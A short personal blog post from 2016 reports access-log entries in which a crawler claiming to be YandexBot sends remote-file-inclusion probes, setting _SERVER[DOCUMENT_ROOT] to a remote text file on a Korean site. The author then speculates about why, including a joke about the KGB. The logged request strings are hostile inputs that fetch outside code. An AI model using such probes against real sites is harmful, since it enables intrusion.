Autarchy of the Private Cave

Tiny bits of bioinformatics, [web-]programming etc

  • Related entries

    No related content found.

    Yandex probing for vulnerabilities in .UA domains?

    11th April 2016

    Here is a recent entry from my web-server’s access log:

    bogdan.org.ua:80 130.193.51.57 – - [09/Apr/2016:15:53:22 +0300] “GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1″ 200 13158 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

    Client’s IP 130.193.51.57 does belong to Yandex network range.

    So…

    • Had Yandex started looking for vulnerabilities in the web-sites it scans?
    • Does it only look for vulnerabilities in the .UA web-sites/domains?
    • Does Yandex really use a Korean web-site to host malicious code?

    In fact, there are more entries like that one, also from one of Yandex IPs:

    bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:14:22 +0300] “GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12607 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
    bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:19:31 +0300] “GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12174 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

    I can see 3 explanations, and all of them are bad for Yandex:

    • Yandex now belongs to KGB, and it does scan [.UA] web-sites for vulnerabilities;
    • some/many of Yandex crawler servers are compromised, and are used by malicious 3rd parties;
    • there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.
    StumbleUponDeliciousCiteULikePocketKindle ItEvernotePinterestShare

    Leave a Reply

    XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>